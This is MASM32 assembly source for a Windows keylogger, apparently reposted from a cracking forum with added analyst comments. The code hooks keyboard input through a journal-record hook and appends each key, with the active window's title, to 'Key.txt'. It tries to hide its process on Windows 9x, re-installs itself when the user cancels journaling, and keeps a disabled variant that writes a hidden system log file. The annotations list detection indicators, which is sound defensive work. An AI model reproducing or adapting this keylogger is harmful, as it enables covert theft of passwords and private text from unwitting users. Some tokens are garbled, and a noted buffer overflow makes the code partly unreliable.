来源(白菜乐园)

From: http://www.crackbest.org/read.php?tid=19

.486
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

; Forward declaration of the hook procedure (declared here with three WORD
; arguments).
JournalLogHook PROTO WORD, WORD, WORD

; Initialised data.
; Analyst note: the literals "Key.txt", "kernel32.dll",
; "RegisterServiceProcess" and the "[> %s <]" format string are stored as
; plain text, so a string scan of a built binary surfaces them as static
; indicators.
.data
bracket1 db "<"                         ; one byte written before a multi-character key name
bracket2 db ">"                         ; one byte written after a multi-character key name
; wsprintf format for the window-title header; its first two bytes (CR LF)
; are also written on their own after the Return key.
linefeed db 13,10,13,10,"[> %s <]",13,10,0;
isLogging dd 1                          ; message-loop flag; no visible code ever clears it
vKey dd 0                               ; EVENTMSG.paramL with bits 8-15 cleared
nScan dd 0                              ; EVENTMSG.paramL, low byte cleared, shifted left 8
dwCount dd 0                            ; length returned by GetKeyNameText
schar db 2 dup (0)                      ; character output buffer for ToAsciiEx
logfileN db "Key.txt", 16 dup(0)        ; log file name; relative, so it resolves against the current directory
kernel_name db "kernel32.dll", 0        ; module queried in `start`
kernel_function db "RegisterServiceProcess", 0 ; export resolved at run time in `start`

; Uninitialised data.
.data?
logfile db 261 dup (?)                  ; not referenced by the visible code
hinstance HINSTANCE ?                   ; module handle passed to SetWindowsHookEx
aMsg MSG <?>                            ; message record filled by GetMessage
LogHook dd ?                            ; hook handle returned by SetWindowsHookEx
; NOTE(review): declared as a single dword, yet passed to GetKeyNameText with a
; stated capacity of 256, so longer key names extend into the variables that
; follow it.
svBuffer dword ?
WinDir db 35 dup(?)                     ; referenced only by the commented-out code path
MyPath db 256 dup(?)                    ; referenced only by the commented-out code path
kBuffer db 256 dup (?)                  ; shared: window title text AND 256-byte keyboard-state array
kFwin db 256 dup (?)                    ; not referenced by the visible code
kGkl db 256 dup (?)                     ; not referenced by the visible code
wBuffer db 512 dup (?)                  ; formatted window-title header (wsprintf output)
chcount dd ?                            ; scratch count: title length, header length, or ToAsciiEx result
dwBytes dd ?                            ; bytes-written output of WriteFile (never inspected)
aFocus dd ?                             ; window handle returned by GetActiveWindow for this event
lFocus dd ?                             ; window handle seen on the previous event
lastvKey dd ?                           ; vKey of the previous logged key

.code
;-----------------------------------------------------------------------
; JournalLogHook - hook procedure that `start` registers for
; WH_JOURNALRECORD.
; ABI:   stdcall (per `.model flat, stdcall`)
; In:    code   = hook code; only HC_ACTION is processed
;        wParam = forwarded unchanged to CallNextHookEx
;        lParam = read as a pointer to an EVENTMSG when code == HC_ACTION
; Out:   eax    = return value of CallNextHookEx
; Uses:  edi (saved/restored by the `uses edi` clause)
;
; Effect: on every WM_KEYDOWN event the procedure opens the file named by
; logfileN, seeks to its end, and appends
;   - a "[> window title <]" header whenever the handle returned by
;     GetActiveWindow differs from the previous event, and
;   - the key: the character(s) produced by ToAsciiEx for one-character
;     key names, or "<keyname>" for longer names.
; The file is then closed again.
;
; Analyst notes:
;   - Input capture via a journal-record hook; the SetWindowsHookEx call
;     with WH_JOURNALRECORD in `start` is the API-level detection point.
;     Journal hooks are documented as unsupported starting with Windows 11.
;   - One open/append/close cycle per key press on a file called "Key.txt"
;     gives a distinctive file-system telemetry pattern.
;   - Window titles are logged next to the keys, so the log ties typed
;     text to the application it was typed into.
;   - No API return value other than those stored below is checked.
;-----------------------------------------------------------------------
JournalLogHook proc uses edi code WORD, wParam:WPARAM, lParam:LPARAM
    LOCAL filehandle:dword              ; log file handle for this event
    ; Hook codes that compare below zero go straight to the next hook.
    .if code < 0
        invoke CallNextHookEx, LogHook, code, wParam, lParam
        ret
    .endif
    .if code == HC_ACTION
        ; lParam is accessed through edi as an EVENTMSG (message, paramL).
        mov edi, lParam
        assume editr EVENTMSG
        .if [edi].message == WM_KEYDOWN
            ; vKey = paramL with bits 8-15 cleared; its low byte is compared
            ; against VK_* constants below.
            mov eax, [edi].paramL
            mov ah, 0
            mov vKey, eax
            ; nScan = paramL with the low byte cleared, shifted left by 8:
            ; the byte from bits 8-15 ends up in bits 16-23, which is where
            ; GetKeyNameText takes the scan code from.
            mov eax, [edi].paramL
            mov al, 0
            shl eax, 8
            mov nScan, eax
            ; Disabled variant left by the author: builds a path under the
            ; Windows directory and creates the log there with the HIDDEN and
            ; SYSTEM attributes.
            ;invoke GetModuleFileName, 0, addr MyPath, sizeof MyPath
            ;invoke GetWindowsDirectory, addr WinDir, 35; or {GetSystemDirectory}
            ;invoke lstrcat, addr WinDir, addr logfileN
            ;invoke lstrcmpi, addr MyPath, addr WinDir
            ;invoke CreateFile, addr WinDir,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALW AYS,FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM,NULL
            ; Active variant: open logfileN ("Key.txt") for writing with
            ; normal attributes; FILE_SHARE_READ lets other processes read it
            ; while it is open.
            invoke CreateFile, addr logfileN,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_A LWAYS,FILE_ATTRIBUTE_NORMAL,NULL; TEST
            mov filehandle, eax
            ; Position at end of file so every write appends.
            invoke SetFilePointer, filehandle,NULL, NULL, FILE_END
            ; Key name for this scan code -> svBuffer; returned length -> dwCount.
            invoke GetKeyNameText, nScan,addr svBuffer, 256
            mov dwCount, eax
            ; Emit a title header only when the active window handle changed
            ; since the previous event.
            invoke GetActiveWindow
            mov aFocus, eax
            .if eax != lFocus
                mov lFocus, eax
                invoke GetWindowText, aFocus, addr kBuffer, 256
                mov chcount, eax
                .if chcount > 0
                    ; Format "[> title <]" into wBuffer and append it.
                    invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
                    invoke lstrlen, addr wBuffer
                    mov chcount, eax
                    invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
                .endif
            .endif
            ; Only keys for which GetKeyNameText returned a name are logged.
            .if dwCount > 0
                ; Space, Caps Lock and Shift are forced onto the
                ; single-character path (dwCount = 1) instead of being
                ; written as "<name>".
                .if vKey == VK_SPACE
                    mov svBuffer, 32
                    mov svBuffer + 1, 0
                    mov dwCount, 1
                .endif
                .if vKey == VK_CAPITAL
                    mov svBuffer,0
                    mov dwCount,1
                .endif
                .if vKey == VK_SHIFT
                    mov svBuffer,0
                    mov dwCount,1
                .endif
                .if dwCount == 1
                    ; 186 is 0xBA (VK_OEM_1). When the previous key was not
                    ; 186, translate through ToAsciiEx; otherwise write the
                    ; low byte of vKey directly.
                    ; NOTE(review): presumably a dead-key workaround - the
                    ; listing does not say; confirm before relying on it.
                    .if lastvKey != 186
                        ; kBuffer is reused here as the 256-byte key-state array.
                        invoke GetKeyboardState, addr kBuffer
                        ; foreground window -> owning thread id -> that
                        ; thread's keyboard layout, each passed along in eax.
                        invoke GetForegroundWindow
                        invoke GetWindowThreadProcessId,eax,0
                        invoke GetKeyboardLayout ,eax;
                        ; Translate the key into schar; result count -> chcount.
                        invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax
                        mov chcount, eax
                    .else
                        mov chcount, 1
                        mov eax, vKey
                        mov schar, al
                    .endif
                    .if chcount > 0
                        invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
                    .endif
                .else
                    ; Named key: append "<", the key name, ">".
                    invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
                    invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
                    invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL
                    .if vKey == VK_RETURN
                        ; First two bytes of `linefeed` are CR LF.
                        invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
                    .endif
                .endif
                ; Remember this key for the 186 check on the next event.
                mov eax, vKey
                mov lastvKey, eax
            .endif
            invoke CloseHandle, filehandle
        .endif
    .endif
    ; Always hand the event on so the rest of the hook chain still sees it.
    invoke CallNextHookEx, LogHook, code, wParam, lParam
    ret
JournalLogHook endp

;-----------------------------------------------------------------------
; start - program entry point.
;   1. Resolves RegisterServiceProcess from kernel32.dll at run time and,
;      if the export is present, calls it with the arguments (0, 1).
;   2. Installs JournalLogHook as a WH_JOURNALRECORD hook.
;   3. Runs a message loop; on WM_CANCELJOURNAL it clears the keyboard
;      state and installs the hook again.
;
; Analyst notes:
;   - The function name is looked up with GetProcAddress rather than
;     imported, so it is absent from the import table but present as a
;     plain string in .data.
;   - The author's comment marks the call as a Windows 9x-only hiding
;     step; where the export is missing GetProcAddress returns NULL and
;     the call is skipped.
;   - Because the hook is re-installed on WM_CANCELJOURNAL, a user
;     cancelling journaling does not stop capture while this process is
;     alive; ending the process does.
;   - isLogging is never changed by the visible code, so the loop has no
;     exit and the two calls after .endw are not reached.
;-----------------------------------------------------------------------
start:
    ;try to hide only 9x
    invoke GetModuleHandle, ADDR kernel_name
    invoke GetProcAddress, eax, ADDR kernel_function
    .if eax != NULL
        ; stdcall, pushed right to left: first argument 0, second argument 1.
        push 1
        push 0
        call eax
    .endif
    ; Handle of this executable, used as the hook's module handle.
    invoke GetModuleHandle, NULL
    ;----------------------------
    mov hinstance, eax
    ; Install the journal-record hook; the returned handle is kept in LogHook.
    invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
    mov LogHook, eax
    .while isLogging == 1
        ; Block until a message is queued, then fetch it into aMsg.
        invoke WaitMessage
        invoke GetMessage, addr aMsg, NULL, 0, 0
        .if aMsg.message == WM_CANCELJOURNAL
            ; Zero kBuffer (64 dwords = 256 bytes) and load it as the
            ; keyboard state, i.e. mark every key as up and untoggled.
            mov edi, offset kBuffer
            mov ecx, 64
            xor eax, eax
            rep stosd
            invoke SetKeyboardState, addr kBuffer
            ; Re-install the hook after journaling was cancelled.
            invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
            mov LogHook, eax
        .endif
    .endw
    invoke UnhookWindowsHookEx,addr LogHook
    invoke ExitProcess, 0
end start

Link: http://www.asm32.net/article_details.aspx?id=5232